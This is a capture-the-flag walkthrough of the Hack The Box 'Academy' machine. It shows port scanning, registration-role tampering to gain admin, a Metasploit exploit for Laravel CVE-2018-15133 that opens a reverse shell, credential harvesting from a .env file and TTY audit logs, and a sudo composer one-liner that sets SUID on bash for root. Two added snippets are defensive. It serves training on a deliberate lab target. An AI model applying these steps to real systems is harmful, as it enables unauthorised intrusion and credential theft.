Academy
Academy Linux · Easy - Adventure mode
🔭 Reconnaissance:
┌──(pmartinezr㉿kali)-[~]
└─$ nmap -p- -sSVC --min-rate 5000 10.129.5.74
Starting Nmap 7.98 ( https://nmap.org ) at 2026-02-14 00:36 +0100
Nmap scan report for 10.129.5.74
Host is up (0.054s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx MySQL X protocol listener
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.25 seconds
The initial website lets us log in or register.
┌──(pmartinezr㉿kali)-[~]
└─$ dirsearch -u http://academy.htb
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/pmartinezr/reports/http_academy.htb/_26-02-14_00-47-43.txt
Target: http://academy.htb/
[00:47:43] Starting:
[00:47:47] 403 - 276B - /.htaccess.orig
[00:47:47] 403 - 276B - /.ht_wsr.txt
[00:47:47] 403 - 276B - /.htaccess.save
[00:47:47] 403 - 276B - /.htaccess.bak1
[00:47:47] 403 - 276B - /.htaccess.sample
[00:47:47] 403 - 276B - /.htaccess_extra
[00:47:47] 403 - 276B - /.htaccess_orig
[00:47:47] 403 - 276B - /.htaccess_sc
[00:47:47] 403 - 276B - /.htaccessOLD
[00:47:47] 403 - 276B - /.htaccessBAK
[00:47:47] 403 - 276B - /.htaccessOLD2
[00:47:47] 403 - 276B - /.htm
[00:47:47] 403 - 276B - /.html
[00:47:47] 403 - 276B - /.htpasswd_test
[00:47:47] 403 - 276B - /.httr-oauth
[00:47:47] 403 - 276B - /.htpasswds
[00:47:49] 403 - 276B - /.php
[00:47:56] 200 - 968B - /admin.php
[00:48:15] 200 - 0B - /config.php
[00:48:26] 302 - 54KB - /home.php -> login.php
[00:48:27] 301 - 311B - /images -> http://academy.htb/images/
[00:48:27] 403 - 276B - /images/
[00:48:32] 200 - 964B - /login.php
[00:48:47] 200 - 1001B - /register.php
[00:48:49] 403 - 276B - /server-status
[00:48:50] 403 - 276B - /server-status/
Dirsearch discovers an admin.php page.
To get administrator permissions on the site it is enough to modify the request made during registration: if we look closely, the roleid parameter is sent as 0, so I decided to change it to 1, assuming 1 is the administrator role.
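The flaw is that the registration handler binds whatever the client sends, including roleid. The following is an added example (not the box's PHP code) showing that pattern beside a hardened handler that only binds allow-listed fields and assigns the role server-side; the field names uid, password and email are assumptions, roleid is the real parameter from the request.

```python
# Added example (not the box's PHP): the registration flaw in miniature.
# `form` stands for the POSTed fields; uid/password/email are assumed names,
# roleid is the parameter actually seen in the registration request.
ROLE_USER, ROLE_ADMIN = 0, 1
USERS = {}  # uid -> stored record (password hashing/storage is out of scope here)


def register_vulnerable(form):
    """Binds every submitted field, so the client gets to pick its own roleid."""
    USERS[form["uid"]] = {"roleid": int(form.get("roleid", ROLE_USER))}
    return USERS[form["uid"]]


ALLOWED_FIELDS = {"uid", "password", "email"}


def register(form):
    """Binds only allow-listed fields; the role is decided server-side."""
    unexpected = set(form) - ALLOWED_FIELDS
    record = {"uid": form["uid"], "email": form.get("email")}
    record["roleid"] = ROLE_USER            # never taken from the request
    record["tampered"] = bool(unexpected)   # a stray roleid etc.: worth logging/alerting on
    USERS[record["uid"]] = record
    return record


def is_admin(uid):
    return USERS.get(uid, {}).get("roleid") == ROLE_ADMIN
```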
Now, logging in as administrator on the admin.php page, we discover a new domain, dev-staging-01.academy.htb, which we add to our /etc/hosts so we can access it and see what is there.
We find a Laravel development panel.
After investigating a bit we discover an API key, and the relevant vulnerability:
CVE-2018-15133
A search on the Internet turns up a Metasploit module that exploits this CVE.
🪲 Exploitation:
https://www.exploit-db.com/exploits/47129
👽 Actions:
msf exploit(unix/http/laravel_token_unserialize_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.74:4444
[*] Command shell session 1 opened (10.10.14.74:4444 -> 10.129.5.78:46262) at 2026-02-14 01:52:34 +0100
whoami
www-data
www-data@academy:/home$ ls -ltR
ls -ltR
.:
total 24
drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12 2020 mrb3n
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 2020 cry0l1t3
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 2020 egre55
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 2020 g0blin
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 2020 ch4p
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 2020 21y4d
./mrb3n:
total 0
The exploit works perfectly, and I begin reconnaissance and enumeration of possible users.
www-data@academy:/var/www/html/academy$ cat .env
cat .env
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
APP_DEBUG=false
APP_URL=http://localhost
LOG_CHANNEL=stack
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
BROADCAST_DRIVER=log
CACHE_DRIVER=file
SESSION_DRIVER=file
SESSION_LIFETIME=120
QUEUE_DRIVER=sync
REDIS_HOST=127.0.0.1
REDIS_PASSWORD=null
REDIS_PORT=6379
MAIL_DRIVER=smtp
MAIL_HOST=smtp.mailtrap.io
MAIL_PORT=2525
MAIL_USERNAME=null
MAIL_PASSWORD=null
MAIL_ENCRYPTION=null
PUSHER_APP_ID=
PUSHER_APP_KEY=
PUSHER_APP_SECRET=
PUSHER_APP_CLUSTER=mt1
MIX_PUSHER_APP_KEY="${PUSHER_APP_KEY}"
MIX_PUSHER_APP_CLUSTER="${PUSHER_APP_CLUSTER}"
After investigating a bit I discover that there is a .env file in the academy folder, and in it a password: mySup3rP4s5w0rd!!
total 4
-r--r----- 1 cry0l1t3 cry0l1t3 33 Feb 14 00:01 user.txt
┌──(pmartinezr㉿kali)-[~/htb/academy]
└─$ echo "drwxr-xr-x 5 mrb3n mrb3n 4096 Aug 12 2020 mrb3n
drwxr-xr-x 4 cry0l1t3 cry0l1t3 4096 Aug 12 2020 cry0l1t3
drwxr-xr-x 3 egre55 egre55 4096 Aug 10 2020 egre55
drwxr-xr-x 2 g0blin g0blin 4096 Aug 10 2020 g0blin
drwxr-xr-x 2 ch4p ch4p 4096 Aug 10 2020 ch4p
drwxr-xr-x 2 21y4d 21y4d 4096 Aug 10 2020 21y4d" | awk '{print $3}'
mrb3n
cry0l1t3
egre55
g0blin
ch4p
21y4d
I build a list of users, and it already gives us a hint about which user we should impersonate.
www-data@academy:/var/www/html/academy$ su - cry0l1t3
su - cry0l1t3
Password: mySup3rP4s5w0rd!!
$ pwd
pwd
/home/cry0l1t3
$ cat user.txt
cat user.txt
bf155f0b6a105f12f*******
Indeed, the user cry0l1t3 uses the password we found. We have the first flag.
cry0l1t3@academy:/var/log$ aureport --tty
TTY Report
===============================================
# date time event auid term sess comm data
===============================================
Error opening config file (Permission denied)
NOTE - using built-in logs: /var/log/audit/audit.log
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
3. 08/12/2020 02:28:24 89 0 ? 1 sh "whoami",<nl>
4. 08/12/2020 02:28:28 90 0 ? 1 sh "exit",<nl>
5. 08/12/2020 02:28:37 93 0 ? 1 sh "/bin/bash -i",<nl>
6. 08/12/2020 02:30:43 94 0 ? 1 nano <delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
7. 08/12/2020 02:32:13 95 0 ? 1 nano <down>,<up>,<up>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<down>,<backspace>,<down>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<delete>,<^X>,"y",<ret>
8. 08/12/2020 02:32:55 96 0 ? 1 nano "6",<^X>,"y",<ret>
9. 08/12/2020 02:33:26 97 0 ? 1 bash "ca",<up>,<up>,<up>,<backspace>,<backspace>,"cat au",<tab>,"| grep data=",<ret>,"cat au",<tab>,"| cut -f11 -d\" \"",<ret>,<up>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<left>,<right>,<right>,"grep data= | ",<ret>,<up>," > /tmp/data.txt",<ret>,"id",<ret>,"cd /tmp",<ret>,"ls",<ret>,"nano d",<tab>,<ret>,"cat d",<tab>," | xx",<tab>,"-r -p",<ret>,"ma",<backspace>,<backspace>,<backspace>,"nano d",<tab>,<ret>,"cat dat",<tab>," | xxd -r p",<ret>,<up>,<left>,"-",<ret>,"cat /var/log/au",<tab>,"t",<tab>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,<backspace>,"d",<tab>,"aud",<tab>,"| grep data=",<ret>,<up>,<up>,<up>,<up>,<up>,<down>,<ret>,<up>,<up>,<up>,<ret>,<up>,<up>,<up>,<ret>,"exit",<backspace>,<backspace>,<backspace>,<backspace>,"history",<ret>,"exit",<ret>
10. 08/12/2020 02:33:26 98 0 ? 1 sh "exit",<nl>
11. 08/12/2020 02:33:30 107 0 ? 1 sh "/bin/bash -i",<nl>
12. 08/12/2020 02:33:36 108 0 ? 1 bash "istory",<ret>,"history",<ret>,"exit",<ret>
13. 08/12/2020 02:33:36 109 0 ? 1 sh "exit",<nl>
I discover that the system has the aureport utility installed, which is useful for looking at the logs. Apparently someone mistyped the su command and this was recorded, revealing the user and their password: mrb3n / mrb3n_Ac@d3my!.
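From the defender's side, TTY auditing (pam_tty_audit, especially with its log_passwd option) turns /var/log/audit/audit.log into a store of typed secrets that any account able to read it can recover. The following is an added example (not part of the writeup) that parses raw TTY records, decodes the hex data= field, and flags records written while a secret-reading program such as su or sudo was running, reporting only the length of the captured keystrokes so the credential can be rotated and the record purged without re-exposing it. The log lines are constructed in the audit.log format; the secret in them is a made-up placeholder.

```python
import re

# Constructed sample in the pam_tty_audit record format of /var/log/audit/audit.log
# (not the box's real log); the secret on the "su" line is a made-up placeholder.
SAMPLE_AUDIT_LOG = """\
type=TTY msg=audit(1597199290.412:83): tty pid=1360 uid=1002 auid=0 ses=1 major=136 minor=2 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.101:84): tty pid=1365 uid=1002 auid=0 ses=1 major=136 minor=2 comm="su" data={pw}
type=TTY msg=audit(1597199304.733:89): tty pid=1365 uid=1001 auid=0 ses=1 major=136 minor=2 comm="sh" data=77686F616D690A
""".format(pw="Example-Secret-1!".encode().hex().upper())

# Programs that read a secret from the terminal: keystrokes recorded while
# they run are almost certainly credentials.
SECRET_READERS = {"su", "sudo", "passwd", "ssh", "mysql"}

TTY_RE = re.compile(
    r'^type=TTY msg=audit\((?P<ts>[\d.]+):(?P<event>\d+)\): .*?'
    r'auid=(?P<auid>\d+) .*?comm="(?P<comm>[^"]+)" data=(?P<data>[0-9A-Fa-f]+)'
)


def parse_tty_records(lines):
    """Yield one dict per TTY record, with the hex data= field decoded to text."""
    for line in lines:
        m = TTY_RE.match(line)
        if not m:
            continue  # not a TTY record (or a malformed one)
        rec = m.groupdict()
        rec["keystrokes"] = bytes.fromhex(rec.pop("data")).decode("utf-8", "replace")
        yield rec


def find_leaked_secrets(lines):
    """Return (event, comm, auid, redacted) for records that likely hold a credential.

    The keystrokes themselves are never returned, only a mask of their length,
    so the report can be shared without re-exposing the secret.
    """
    hits = []
    for rec in parse_tty_records(lines):
        if rec["comm"] in SECRET_READERS:
            hits.append((int(rec["event"]), rec["comm"], int(rec["auid"]),
                         "*" * len(rec["keystrokes"])))
    return hits


if __name__ == "__main__":
    for event, comm, auid, redacted in find_leaked_secrets(SAMPLE_AUDIT_LOG.splitlines()):
        print(f"event {event}: {comm} (auid {auid}) captured {len(redacted)} secret keystrokes;"
              " rotate the credential and purge the record")
```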
cry0l1t3@academy:/var/log$ su mrb3n
Password:
$ whoami
mrb3n
$ sudo -l
[sudo] password for mrb3n:
Matching Defaults entries for mrb3n on academy:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mrb3n may run the following commands on academy:
(ALL) /usr/bin/composer
The sudo command reveals a privilege escalation vector.
https://gtfobins.org/gtfobins/composer/#sudo
echo '{"scripts":{"x":"chmod u+s /bin/bash"}}' >composer.json;sudo composer run-script x
I didn't follow the gtfobins recommendation exactly, but the important thing is that it works.